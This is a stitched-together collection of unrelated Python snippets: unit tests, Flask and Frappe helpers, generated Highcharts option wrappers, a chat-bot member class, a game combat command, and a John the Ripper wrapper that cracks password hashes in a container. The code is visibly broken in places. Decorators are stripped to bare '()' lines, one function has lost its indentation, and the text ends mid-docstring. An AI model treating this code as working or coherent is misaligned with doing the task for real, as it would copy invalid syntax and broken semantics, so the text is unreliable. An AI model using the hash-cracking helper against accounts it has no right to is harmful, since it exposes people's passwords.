    key = np.zeros(16, dtype='uint8')
    t0 = time.process_time()
    scared.des.encrypt(data_u8, key)
    pt_u8 = (time.process_time() - t0)
    t0 = time.process_time()
    scared.des.encrypt(data_u32, key)
    pt_u32 = (time.process_time() - t0)
    # Allow 50% overhead for the wider dtype before flagging a slowdown.
    assert (pt_u32 < (1.5 * pt_u8))
def templated(template_name):
    """Decorator factory: render a view's dict result with ``template_name``.

    The wrapped view may return:
      * ``None``           -> rendered with an empty context,
      * a ``dict``         -> rendered as the template context,
      * anything else      -> passed through unchanged (e.g. a redirect).
    """
    from functools import wraps

    def decorator(func):
        # FIX: the original had a bare ``(func)`` no-op expression here --
        # a stripped ``@wraps(func)``; restored so the wrapper keeps the
        # view's __name__/__doc__ for Flask endpoint naming.
        @wraps(func)
        def decorated_function(*args, **kwargs):
            ctx = func(*args, **kwargs)
            if ctx is None:
                ctx = {}
            elif not isinstance(ctx, dict):
                # Non-dict results (responses, redirects) bypass rendering.
                return ctx
            return render_template(template_name, **ctx)
        return decorated_function
    return decorator
class TestJobRequestSchema():
    """Validation tests for JobRequestSchema.

    NOTE(review): the bare ``()`` line below is a truncated decorator --
    presumably ``@pytest.fixture``; confirm against the original source.
    """
    ()
    def job(self):
        # Fixture: a fully valid job request payload.
        return {'control': {'continue_on_error': False}, 'context': {'switches': [1, 2, 3], 'correlation_id': six.u(str(uuid.uuid4()))}, 'actions': [{'action': 'test_action_name', 'body': {'first_name': 'Bob', 'last_name': 'Mueller'}}]}

    def test_valid_job(self, job):
        errors = JobRequestSchema.errors(job)
        assert (not errors)

    def test_missing_control(self, job):
        # 'control' is required.
        del job['control']
        errors = JobRequestSchema.errors(job)
        assert (len(errors) == 1)
        assert (errors[0].pointer == 'control')

    def test_invalid_control(self, job):
        # 'control' must be a mapping, not a string.
        job['control'] = 'invalid control type'
        errors = JobRequestSchema.errors(job)
        assert (len(errors) == 1)
        assert (errors[0].pointer == 'control')

    def test_missing_actions(self, job):
        # 'actions' is required.
        del job['actions']
        errors = JobRequestSchema.errors(job)
        assert (len(errors) == 1)
        assert (errors[0].pointer == 'actions')

    def test_invalid_actions(self, job):
        # 'actions' must be a list, not a string.
        job['actions'] = 'invalid actions type'
        errors = JobRequestSchema.errors(job)
        assert (len(errors) == 1)
        assert (errors[0].pointer == 'actions')

    def test_empty_actions(self, job):
        # At least one action is required.
        job['actions'] = []
        errors = JobRequestSchema.errors(job)
        assert (len(errors) == 1)
        assert (errors[0].pointer == 'actions')
class TestActionFileDeleteSnapshots(CuratorTestCase):
    """Integration tests for the delete_snapshots action file."""

    def test_deletesnapshot(self):
        # Take three snapshots roughly a second apart, then delete those
        # older than the first recorded timestamp; two should remain.
        self.create_repository()
        timestamps = []
        for i in range(1, 4):
            self.add_docs(f'my_index{i}')
            ilo = IndexList(self.client)
            snap = Snapshot(ilo, repository=self.args['repository'], name='curator-%Y%m%d%H%M%S', wait_interval=0.5)
            snap.do_action()
            snapshot = get_snapshot(self.client, self.args['repository'], '*')
            assert (i == len(snapshot['snapshots']))
            # Sleeps space the snapshots out so age-based filtering works.
            time.sleep(1.0)
            timestamps.append(int(time.time()))
            time.sleep(1.0)
        self.write_config(self.args['configfile'], testvars.client_config.format(HOST))
        self.write_config(self.args['actionfile'], testvars.delete_snap_proto.format(self.args['repository'], 'age', 'creation_date', 'older', ' ', 'seconds', '0', timestamps[0]))
        self.invoke_runner()
        snapshot = get_snapshot(self.client, self.args['repository'], '*')
        assert (2 == len(snapshot['snapshots']))

    def test_no_repository(self):
        # Blank repository in the action file -> runner exits non-zero.
        self.write_config(self.args['configfile'], testvars.client_config.format(HOST))
        self.write_config(self.args['actionfile'], testvars.delete_snap_proto.format(' ', 'age', 'creation_date', 'older', ' ', 'seconds', '0', ' '))
        self.invoke_runner()
        assert (1 == self.result.exit_code)

    def test_extra_options(self):
        # Unknown options in the action file -> runner exits non-zero.
        self.write_config(self.args['configfile'], testvars.client_config.format(HOST))
        self.write_config(self.args['actionfile'], testvars.bad_option_proto_test.format('delete_snapshots'))
        self.invoke_runner()
        assert (1 == self.result.exit_code)
# NOTE(review): the bare ``()`` line below is a truncated decorator --
# presumably ``@frappe.whitelist()``; confirm against the original source.
()
def add_multiple_service_units(parent, data):
    """Bulk-create numbered Healthcare Service Units under ``parent``.

    ``data`` is a JSON string containing healthcare_service_unit_name,
    count and optional company / service_unit_type / service_unit_capacity
    / warehouse.  Returns the list of names that failed to insert.
    """
    if ((not parent) or (not data)):
        return
    data = json.loads(data)
    # Resolve company: explicit value, user defaults, then global default.
    company = (data.get('company') or frappe.defaults.get_defaults().get('company') or frappe.db.get_single_value('Global Defaults', 'default_company'))
    if ((not data.get('healthcare_service_unit_name')) or (not company)):
        frappe.throw(_('Service Unit Name and Company are mandatory to create Healthcare Service Units'), title=_('Missing Required Fields'))
    count = cint((data.get('count') or 0))
    if (count <= 0):
        frappe.throw(_('Number of Service Units to be created should at least be 1'), title=_('Invalid Number of Service Units'))
    capacity = cint((data.get('service_unit_capacity') or 1))
    # Template document reused for every created unit.
    service_unit = {'doctype': 'Healthcare Service Unit', 'parent_healthcare_service_unit': parent, 'service_unit_type': (data.get('service_unit_type') or None), 'service_unit_capacity': (capacity if (capacity > 0) else 1), 'warehouse': (data.get('warehouse') or None), 'company': company}
    service_unit_name = '{}'.format(data.get('healthcare_service_unit_name').strip(' -'))
    # Continue numbering after the highest existing '<name>-NNNN' suffix.
    last_suffix = frappe.db.sql('SELECT\n\t\tIFNULL(MAX(CAST(SUBSTRING(name FROM %(start)s FOR 4) AS UNSIGNED)), 0)\n\t\tFROM `tabHealthcare Service Unit`\n\t\tWHERE name like %(prefix)s AND company=%(company)s', {'start': (len(service_unit_name) + 2), 'prefix': '{}-%'.format(service_unit_name), 'company': company}, as_list=1)[0][0]
    start_suffix = (cint(last_suffix) + 1)
    failed_list = []
    for i in range(start_suffix, (count + start_suffix)):
        # Zero-padded 4-digit suffix, e.g. 'Ward-0001'.
        service_unit['healthcare_service_unit_name'] = '{}-{}'.format(service_unit_name, cstr(('%0*d' % (4, i))))
        service_unit_doc = frappe.get_doc(service_unit)
        try:
            service_unit_doc.insert()
        except Exception:
            # Collect failures instead of aborting the whole batch.
            failed_list.append(service_unit['healthcare_service_unit_name'])
    return failed_list
def crack_hash(passwd_entry: bytes, result_entry: dict, format_term: str='') -> bool:
    """Try to crack a password hash with John the Ripper in a container.

    Writes the outcome into ``result_entry`` ('log', and either 'password'
    or 'ERROR').  Returns True iff a password was recovered.
    """
    with NamedTemporaryFile() as fp:
        fp.write(passwd_entry)
        fp.seek(0)
        # Bind-mount the hash file and the shared pot file into the
        # containerized john.
        john_process = run_docker_container('fact/john:alpine-3.18', command=f'/work/input_file {format_term}', mounts=[Mount('/work/input_file', fp.name, type='bind'), Mount('/root/.john/john.pot', str(JOHN_POT), type='bind')], logging_label='users_and_passwords')
        result_entry['log'] = john_process.stdout
        if ('No password hashes loaded' in john_process.stdout):
            result_entry['ERROR'] = 'hash type is not supported'
            return False
        output = parse_john_output(john_process.stdout)
        if output:
            if any((('0 password hashes cracked' in line) for line in output)):
                result_entry['ERROR'] = 'password cracking not successful'
                return False
            with suppress(IndexError):
                # john prints '<user>:<password>:...'; take the second field.
                result_entry['password'] = output[0].split(':')[1]
                return True
    return False
class OptionSeriesBarSonificationTracks(Options):
    """Generated Highcharts option wrapper: series.bar.sonification.tracks.

    NOTE(review): several names are defined twice (getter, then setter);
    without the original @property/@<name>.setter decorators the second
    definition shadows the first -- presumably decorators were stripped
    during extraction; confirm upstream.
    """
    def activeWhen(self) -> 'OptionSeriesBarSonificationTracksActivewhen':
        # Nested option group: conditions under which this track plays.
        return self._config_sub_data('activeWhen', OptionSeriesBarSonificationTracksActivewhen)

    def instrument(self):
        # Default instrument patch.
        return self._config_get('piano')

    def instrument(self, text: str):
        self._config(text, js_type=False)

    def mapping(self) -> 'OptionSeriesBarSonificationTracksMapping':
        return self._config_sub_data('mapping', OptionSeriesBarSonificationTracksMapping)

    def midiName(self):
        return self._config_get(None)

    def midiName(self, text: str):
        self._config(text, js_type=False)

    def pointGrouping(self) -> 'OptionSeriesBarSonificationTracksPointgrouping':
        return self._config_sub_data('pointGrouping', OptionSeriesBarSonificationTracksPointgrouping)

    def roundToMusicalNotes(self):
        return self._config_get(True)

    def roundToMusicalNotes(self, flag: bool):
        self._config(flag, js_type=False)

    def showPlayMarker(self):
        return self._config_get(True)

    def showPlayMarker(self, flag: bool):
        self._config(flag, js_type=False)

    def type(self):
        return self._config_get('instrument')

    def type(self, text: str):
        self._config(text, js_type=False)
def get_channel_path(view):
    """Build a plugin URL that lists the files inside a channel ``view``."""
    params = {
        'ParentId': view.get('Id'),
        'IsMissing': False,
        'ImageTypeLimit': 1,
        'Fields': '{field_filters}',
    }
    path = get_emby_url('{server}/emby/Users/{userid}/Items', params)
    quoted_path = urllib.parse.quote(path)
    return sys.argv[0] + '?url=' + quoted_path + '&mode=GET_CONTENT&media_type=files'
# NOTE(review): the bare ``(stability='beta')`` line is a truncated
# decorator; the ``field(default_factory=...)`` usage below implies the
# class was a @dataclass (plus a stability marker) -- confirm upstream.
(stability='beta')
class ModelRequest():
    """Request payload sent to an LLM model service."""
    model: str
    messages: List[_ModelMessageType]
    temperature: Optional[float] = None
    max_new_tokens: Optional[int] = None
    stop: Optional[str] = None
    stop_token_ids: Optional[List[int]] = None
    context_len: Optional[int] = None
    echo: Optional[bool] = True
    span_id: Optional[str] = None
    context: Optional[ModelRequestContext] = field(default_factory=(lambda : ModelRequestContext()))

    def stream(self) -> bool:
        # Whether the caller asked for a streaming response.
        return (self.context and self.context.stream)

    def copy(self):
        """Deep copy with messages normalized to ModelMessage objects."""
        new_request = copy.deepcopy(self)
        new_request.messages = list(map((lambda m: (m if isinstance(m, ModelMessage) else ModelMessage(**m))), new_request.messages))
        return new_request

    def to_dict(self) -> Dict[(str, Any)]:
        """Dict form with messages as plain dicts; falsy values dropped."""
        new_reqeust = copy.deepcopy(self)
        new_reqeust.messages = list(map((lambda m: (m if isinstance(m, dict) else m.dict())), new_reqeust.messages))
        return {k: v for (k, v) in asdict(new_reqeust).items() if v}

    def get_messages(self) -> List[ModelMessage]:
        """Messages normalized to ModelMessage objects."""
        return list(map((lambda m: (m if isinstance(m, ModelMessage) else ModelMessage(**m))), self.messages))

    def get_single_user_message(self) -> Optional[ModelMessage]:
        """Return the sole message, which must be a single human message."""
        messages = self.get_messages()
        # NOTE(review): ``and`` lets a single non-human message through --
        # likely intended to be ``or``; confirm upstream before changing.
        if ((len(messages) != 1) and (messages[0].role != ModelMessageRoleType.HUMAN)):
            raise ValueError('The messages is not a single user message')
        return messages[0]

    def _build(model: str, prompt: str, **kwargs):
        # NOTE(review): no ``self``/``cls`` -- presumably @staticmethod.
        return ModelRequest(model=model, messages=[ModelMessage(role=ModelMessageRoleType.HUMAN, content=prompt)], **kwargs)

    def to_openai_messages(self) -> List[Dict[(str, Any)]]:
        """Messages converted to the OpenAI chat-completions format."""
        messages = [(m if isinstance(m, ModelMessage) else ModelMessage(**m)) for m in self.messages]
        return ModelMessage.to_openai_messages(messages)
class ConstantField():
    """A field whose values come from calling ``proc`` with the field's date.

    Exposes a minimal field interface: ``to_numpy``, ``metadata`` and repr.
    """

    def __init__(self, date, param, proc, shape, number=None):
        self.date = date
        self.param = param
        self.number = number
        self.proc = proc
        self.shape = shape
        # Dates may arrive as ISO strings or datetime-like objects.
        if isinstance(date, str):
            valid_datetime = date
        else:
            valid_datetime = date.isoformat()
        self._metadata = {
            'valid_datetime': valid_datetime,
            'param': param,
            'level': None,
            'levelist': None,
            'number': number,
        }

    def to_numpy(self, reshape=True, dtype=None):
        """Evaluate ``proc`` at this field's date; optionally reshape to
        ``self.shape`` and cast to ``dtype``."""
        values = self.proc(self.date)
        if reshape:
            values = values.reshape(self.shape)
        return values if dtype is None else values.astype(dtype)

    def __repr__(self):
        return 'ConstantField(%s,%s,%s)' % (self.param, self.date, self.number)

    def metadata(self, name):
        """Look up a single metadata entry by ``name``."""
        return self._metadata[name]
class Member(User):
    """A member of a group chat; a User bound back to its owning group."""

    def __init__(self, raw, group):
        super(Member, self).__init__(raw, group.bot)
        # Store the group's user_name (not the group object) so the group can
        # be re-resolved from the bot even after group objects are refreshed.
        self._group_user_name = group.user_name

    # NOTE(review): group/display_name/name read like properties, and remove()
    # accesses `self.group.remove_members` without calling group() -- that only
    # works if these are @property methods. The decorators were probably lost
    # in extraction; confirm against upstream. Code left byte-identical.
    def group(self):
        # Re-resolve the owning group by its user_name.
        for _group in self.bot.groups():
            if (_group.user_name == self._group_user_name):
                return _group
        raise Exception('failed to find the group belong to')

    def display_name(self):
        # In-group display name from the raw payload (may be None/empty).
        return self.raw.get('DisplayName')

    def remove(self):
        # Remove this member from its owning group.
        return self.group.remove_members(self)

    def name(self):
        # First non-empty of display_name, nick_name, wxid.
        for attr in ('display_name', 'nick_name', 'wxid'):
            _name = getattr(self, attr, None)
            if _name:
                return _name
class _BaseTwitchCombatCommand(Command):
    """Shared base for twitch-combat commands: location gating, argument
    parsing, and combat-handler lookup/creation."""

    def at_pre_command(self):
        # Abort before parsing unless the caller's location allows combat.
        if ((not self.caller.location) or (not self.caller.location.allow_combat)):
            self.msg("Can't fight here!")
            raise InterruptCommand()

    def parse(self):
        """Split args into lhs/rhs around ' on ', else on first whitespace.

        E.g. "sword on troll" -> ("sword", "troll"); "troll" -> ("troll", "").
        Both sides default to '' when no args are given.
        """
        self.args = args = self.args.strip()
        (self.lhs, self.rhs) = ('', '')
        if (not args):
            return
        if (' on ' in args):
            (lhs, rhs) = args.split(' on ', 1)
        else:
            # No ' on ': first token is lhs, remainder (possibly empty) is rhs.
            (lhs, *rhs) = args.split(None, 1)
            rhs = ' '.join(rhs)
        (self.lhs, self.rhs) = (lhs.strip(), rhs.strip())

    def get_or_create_combathandler(self, target=None, combathandler_key='combathandler'):
        """Return the caller's combat handler, ensuring the target has one too.

        Raises InterruptCommand when the target has no hp_max (not attackable).
        """
        if target:
            if (target.hp_max is None):
                self.msg("You can't attack that!")
                raise InterruptCommand()
            # Called for its side effect on the target; the target's handler
            # is intentionally discarded -- only the caller's is returned.
            EvAdventureCombatTwitchHandler.get_or_create_combathandler(target, key=combathandler_key)
        return EvAdventureCombatTwitchHandler.get_or_create_combathandler(self.caller)
def _freeze_matched_bn(module, name, reg_exps, matched_names, unmatched_names):
res = module
if (len(list(module.children())) == 0):
if isinstance(module, nn.modules.batchnorm._BatchNorm):
matched = False
for frozen_layers_regex in reg_exps:
if re.match(frozen_layers_regex, name):
matched = True
matched_names.append(name)
res = FrozenBatchNorm2d.convert_frozen_batchnorm(module)
if (not matched):
unmatched_names.append(name)
return res
for (child_name, child) in module.named_children():
_name = (((name + '.') + child_name) if (name != '') else child_name)
new_child = _freeze_matched_bn(child, _name, reg_exps, matched_names, unmatched_names)
if (new_child is not child):
res.add_module(child_name, new_child)
return res |
class OptionSeriesTreemapStatesInactive(Options):
    """Highcharts ``series.treemap.states.inactive`` options wrapper.

    NOTE(review): each getter/setter pair below shares one name; the
    @property / @<name>.setter decorators were almost certainly stripped in
    extraction (as plain defs, the setter shadows the getter). Code left
    byte-identical; confirm against the generator's output.
    """

    def animation(self) -> 'OptionSeriesTreemapStatesInactiveAnimation':
        # Sub-options object for the inactive-state animation.
        return self._config_sub_data('animation', OptionSeriesTreemapStatesInactiveAnimation)

    def enabled(self):
        # Default: the inactive state is enabled.
        return self._config_get(True)

    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    def opacity(self):
        # Default opacity applied to inactive series (0.2).
        return self._config_get(0.2)

    def opacity(self, num: float):
        self._config(num, js_type=False)
def test_get_ipv4_os():
    """_get_ipv4_os returns NO_DATA when no per-address metadata exists, and
    the recorded short_os for the endpoint's ipv4 address otherwise."""
    endpoint = endpoint_factory('foo')
    endpoint.endpoint_data = {'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1', 'ipv4': '0.0.0.0'}
    # No OS info recorded for any address yet.
    endpoint.metadata = {'ipv4_addresses': {}}
    ipv4_os = GetData._get_ipv4_os(endpoint)
    assert (ipv4_os == NO_DATA)
    # OS info present for the endpoint's address.
    endpoint.metadata = {'ipv4_addresses': {'0.0.0.0': {'short_os': 'foo'}}}
    ipv4_os = GetData._get_ipv4_os(endpoint)
    assert (ipv4_os == 'foo')
class GS(JsPackage):
    """JavaScript wrapper for the gridstack.js grid library.

    Each event method maps one-to-one onto ``grid.on('<event>', cb)`` and
    returns a JsVoid fragment; ``js_funcs`` is converted into the callback
    body (with ``profile`` passed through to the converter).
    """
    # Resource aliases used by the page resolver to load gridstack assets.
    lib_alias = {'js': 'gridstack', 'css': 'gridstack'}

    def added(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
        # Widgets added; callback receives (event, items).
        return JsObjects.JsVoid(("%s.on('added', function(event, items){%s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))

    def change(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
        # Layout changed; `items` is exposed to the callback as `data`.
        return JsObjects.JsVoid(("%s.on('change', function(event, items){let data = items; %s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))

    def disable(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
        # Grid disabled; the grid instance is exposed as `grid`.
        return JsObjects.JsVoid(("%s.on('disable', function(event){let grid = event.target.gridstack; %s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))

    def dragstart(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
        # Drag started on a widget element `el`.
        return JsObjects.JsVoid(("%s.on('dragstart', function(event, el){%s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))

    def drag(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
        # Fired continuously while dragging.
        return JsObjects.JsVoid(("%s.on('drag', function(event, el){%s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))

    def dragstop(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
        # Drag finished.
        return JsObjects.JsVoid(("%s.on('dragstop', function(event, el){%s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))

    def dropped(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
        # Widget dropped from another grid.
        return JsObjects.JsVoid(("%s.on('dropped', function(event, el){%s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))

    def enable(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
        # Grid re-enabled; the grid instance is exposed as `grid`.
        return JsObjects.JsVoid(("%s.on('enable', function(event){let grid = event.target.gridstack; %s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))

    def removed(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
        # Widgets removed; callback receives (event, items).
        return JsObjects.JsVoid(("%s.on('removed', function(event, items){%s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))

    def resizestart(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
        # Resize started on widget element `el`.
        return JsObjects.JsVoid(("%s.on('resizestart', function(event, el){%s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))

    def resize(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
        # Fired continuously while resizing.
        return JsObjects.JsVoid(("%s.on('resize', function(event, el){%s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))

    def resizestop(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
        # Resize finished.
        return JsObjects.JsVoid(("%s.on('resizestop', function(event, el){%s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))

    def init_(self, attrs: dict=None, html_code: str=None):
        # Initialise a single grid; the JS variable name defaults to the
        # component's html_code.
        return JsObjects.JsVoid(("var %s = GridStack.init(%s, '%s')" % ((html_code or self.component.html_code), self.component.options.config_js(attrs), (html_code or self.component.html_code))))

    def initAll(self, attrs: dict=None, selectpr: str='.grid-stack'):
        # Initialise every grid matching the CSS selector.
        return JsObjects.JsVoid(("GridStack.init(%s, '%s')" % (self.component.options.config_js(attrs), selectpr)))

    def addComponent(self, component):
        # Add an epyk component as a widget; mark it unmanaged so its HTML is
        # emitted inline rather than by the page builder.
        component.options.managed = False
        return JsObjects.JsVoid(("%s.addWidget('%s')" % (self.varName, component.html())))
class OptionPlotoptionsArcdiagramStatesSelect(Options):
    """Highcharts ``plotOptions.arcdiagram.states.select`` options wrapper.

    NOTE(review): getter/setter pairs share one name; the @property /
    @<name>.setter decorators were almost certainly stripped in extraction.
    Code left byte-identical; confirm against the generator's output.
    """

    def animation(self) -> 'OptionPlotoptionsArcdiagramStatesSelectAnimation':
        # Sub-options object for the select-state animation.
        return self._config_sub_data('animation', OptionPlotoptionsArcdiagramStatesSelectAnimation)

    def borderColor(self):
        # Default border colour of selected points.
        return self._config_get('#000000')

    def borderColor(self, text: str):
        self._config(text, js_type=False)

    def color(self):
        # Default fill colour of selected points.
        return self._config_get('#cccccc')

    def color(self, text: str):
        self._config(text, js_type=False)

    def enabled(self):
        # Default: the select state is enabled.
        return self._config_get(True)

    def enabled(self, flag: bool):
        self._config(flag, js_type=False)
def test_override():
    """Overriding a container twice stacks the overrides on the instance and
    its providers while the declarative class itself stays untouched."""
    class _Container(containers.DeclarativeContainer):
        p11 = providers.Provider()
    class _OverridingContainer1(containers.DeclarativeContainer):
        p11 = providers.Provider()
    class _OverridingContainer2(containers.DeclarativeContainer):
        p11 = providers.Provider()
        p12 = providers.Provider()
    container = _Container()
    overriding_container1 = _OverridingContainer1()
    overriding_container2 = _OverridingContainer2()
    container.override(overriding_container1)
    container.override(overriding_container2)
    # Overrides accumulate in application order...
    assert (container.overridden == (overriding_container1, overriding_container2))
    assert (container.p11.overridden == (overriding_container1.p11, overriding_container2.p11))
    # ...but only on the instance, never on the declarative class.
    assert (_Container.overridden == tuple())
    assert (_Container.p11.overridden == tuple())
def test_nan_behaviour_error_fit(df_enc_big_na):
    """fit() must raise ValueError with the exact guidance message when
    missing_values='raise' and the input contains NaN."""
    encoder = StringSimilarityEncoder(missing_values='raise')
    with pytest.raises(ValueError) as record:
        encoder.fit(df_enc_big_na)
    msg = "Some of the variables in the dataset contain NaN. Check and remove those before using this transformer or set the parameter `missing_values='ignore'` when initialising this transformer."
    assert (str(record.value) == msg)
class RawLinesEditReplaceCommand(sublime_plugin.TextCommand):
    """One-shot TextCommand that replaces the staged region with staged text.

    Sublime `edit` objects are only valid inside a TextCommand's run(), so
    callers stage ``text``/``region`` on the class and then invoke the
    command; the staged state is cleared after a successful replace.
    """
    text = None
    region = None

    def run(self, edit):
        cls = RawLinesEditReplaceCommand
        staged_text = cls.text
        staged_region = cls.region
        # Do nothing unless both pieces of state have been staged.
        if staged_text is None or staged_region is None:
            return
        self.view.replace(edit, staged_region, staged_text)
        cls.text = None
        cls.region = None
class TestCAM16CAM16LCD(util.ColorAssertsPyTest):
    """Conversion checks for the CAM16 LCD colour space."""

    # (input colour, expected result expressed in --cam16-lcd) pairs.
    COLORS = [('red', 'color(--cam16-lcd 59.178 59.994 31.089)'), ('orange', 'color(--cam16-lcd 78.364 12.557 37.084)'), ('yellow', 'color(--cam16-lcd 96.802 -17.273 44.653)'), ('green', 'color(--cam16-lcd 46.661 -35.677 27.573)'), ('blue', 'color(--cam16-lcd 36.252 11.909 -52.61)'), ('indigo', 'color(--cam16-lcd 24.524 25.511 -29.451)'), ('violet', 'color(--cam16-lcd 74.738 36.686 -20.013)'), ('white', 'color(--cam16-lcd 100 -1.9348 -1.0961)'), ('gray', 'color(--cam16-lcd 56.23 -1.2714 -0.72038)'), ('black', 'color(--cam16-lcd 0 0 0)'), ('color(--cam16-lcd 50 10 -10)', 'color(--cam16-lcd 50 10 -10)'), ('color(--cam16-lcd 50 10 -10 / 0.5)', 'color(--cam16-lcd 50 10 -10 / 0.5)'), ('color(--cam16-lcd 50% 50% -50% / 50%)', 'color(--cam16-lcd 50 35 -35 / 0.5)'), ('color(--cam16-lcd none none none / none)', 'color(--cam16-lcd none none none / none)'), ('color(--cam16-lcd 0% 0% 0%)', 'color(--cam16-lcd 0 0 0)'), ('color(--cam16-lcd 100% 100% 100%)', 'color(--cam16-lcd 100 70 70)'), ('color(--cam16-lcd -100% -100% -100%)', 'color(--cam16-lcd -100 -70 -70)')]

    # Fix: the bare ".parametrize(...)" line was the tail of a stripped
    # @pytest.mark.parametrize decorator (invalid syntax as emitted).
    @pytest.mark.parametrize('color1,color2', COLORS)
    def test_colors(self, color1, color2):
        """Each input converts to the expected CAM16 LCD coordinates."""
        self.assertColorEqual(Color(color1).convert('cam16-lcd'), Color(color2))
def test_asset_store_collect2():
    """update_modules() collects the flexx.ui modules/bundles: the Widget JS
    must appear in its own module, its parent bundles, and the top bundle,
    but not in the unrelated flexx.app bundle."""
    try:
        from flexx import ui
    except ImportError:
        skip('no flexx.ui')
    s = AssetStore()
    s.update_modules()
    # A non-trivial number of modules should be discovered.
    assert (len(s.modules) > 10)
    assert ('flexx.ui._widget' in s.modules)
    # Widget code propagates upwards through the bundle hierarchy.
    assert ('$Widget =' in s.get_asset('flexx.ui._widget.js').to_string())
    assert ('$Widget =' in s.get_asset('flexx.ui.js').to_string())
    assert ('$Widget =' in s.get_asset('flexx.js').to_string())
    # ...but not sideways into a sibling bundle.
    assert ('$Widget =' not in s.get_asset('flexx.app.js').to_string())
def test_interpolate_vs_project(V):
    """Interpolating and projecting the same linear expression into V should
    agree (linear expressions are represented exactly in both)."""
    mesh = V.mesh()
    dim = mesh.geometric_dimension()
    if (dim == 2):
        (x, y) = SpatialCoordinate(mesh)
    elif (dim == 3):
        (x, y, z) = SpatialCoordinate(mesh)
    # Build a scalar/vector/tensor expression matching V's value shape.
    shape = V.ufl_element().value_shape
    if (dim == 2):
        if (len(shape) == 0):
            expression = (x + y)
        elif (len(shape) == 1):
            expression = as_vector([x, y])
        elif (len(shape) == 2):
            expression = as_tensor(([x, y], [x, y]))
    elif (dim == 3):
        if (len(shape) == 0):
            expression = ((x + y) + z)
        elif (len(shape) == 1):
            expression = as_vector([x, y, z])
        elif (len(shape) == 2):
            expression = as_tensor(([x, y, z], [x, y, z], [x, y, z]))
    f = interpolate(expression, V)
    expect = project(expression, V)
    # Compare raw DoF vectors; projection solves a mass system, hence atol.
    assert np.allclose(f.dat.data, expect.dat.data, atol=1e-06)
class JsHtmlLi(JsHtmlRich):
    """JS helpers for list-item components: run code conditionally on the
    element's CSS class state."""

    def has_state(self, state: str, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=None):
        # Execute js_funcs only when the element's classList contains `state`.
        return self.component.js.if_(('%s.classList.contains(%s)' % (self.varName, JsUtils.jsConvertData(state, None))), js_funcs, profile=profile)

    def is_active(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=None):
        # Convenience wrapper for the common 'active' class check.
        return self.has_state('active', js_funcs, profile=profile)
# Fix: restored the "@pytest.mark" prefix stripped from the parametrize
# decorator during extraction (a bare ".parametrize(...)" is invalid syntax).
@pytest.mark.parametrize('compiled', [True, False])
def test_bytes_integer_struct_signed(compiled):
    """Signed 24-bit (int24) parsing: scalars, fixed arrays, dynamic arrays
    sized by a preceding field, and negative values, in both the interpreted
    and compiled cstruct paths."""
    d = '\n    struct test {\n        int24   a;\n        int24   b[2];\n        int24   len;\n        int24   dync[len];\n        int24   c;\n        int24   d[3];\n    };\n    '
    c = cstruct.cstruct()
    c.load(d, compiled=compiled)
    a = c.test(b'AAABBBCCC\x02\x00\x00DDDEEE\xff\xff\xff\x01\xff\xff\x02\xff\xff\x03\xff\xff')
    assert (a.a == 4276545)
    assert (a.b == [4342338, 4408131])
    assert (a.len == 2)
    assert (a.dync == [4473924, 4539717])
    assert (a.c == (- 1))
    assert (a.d == [(- 255), (- 254), (- 253)])
def extractWwwBlackboxTlCom(item):
    """Feed parser for www.blackbox-tl.com releases.

    Returns a release message for items carrying a known tag, None for
    previews or titles without chapter/volume info, and False when no known
    tag matches.
    """
    title = item['title']
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
    # Skip items with no chapter/volume information, and preview posts.
    if not (chp or vol) or 'preview' in title.lower():
        return None
    # tag -> (release name, translation type); insertion order preserved.
    tagmap = {
        'PRC': ('PRC', 'translated'),
        'Loiterous': ('Loiterous', 'oel'),
    }
    for tagname, (name, tl_type) in tagmap.items():
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
class LiveDetails():
    """Aggregates per-frame game state from the individual CV helpers
    (spike, shields, loadouts, agents, scoreboard, health, ultimates)."""

    def __init__(self):
        self.spike_helper = GetSpike()
        self.shield_helper = GetShields()
        self.loadout_helper = GetLoadouts()
        self.header_agent_helper = GetLiveAgents()
        self.scoreboard_agents_helper = GetScoreBoardAgents()
        self.scoreboard_detector_helper = ScoreBoardDetector()
        self.health_helper = GetHealth()
        self.ultimate_helper = GetUltimates()
        # Last observed score pair; kept across frames.
        self.old_score = [0, 0]
        self.match_details = {}

    def get_live_details(self, frame):
        """Extract live match details from a single video frame.

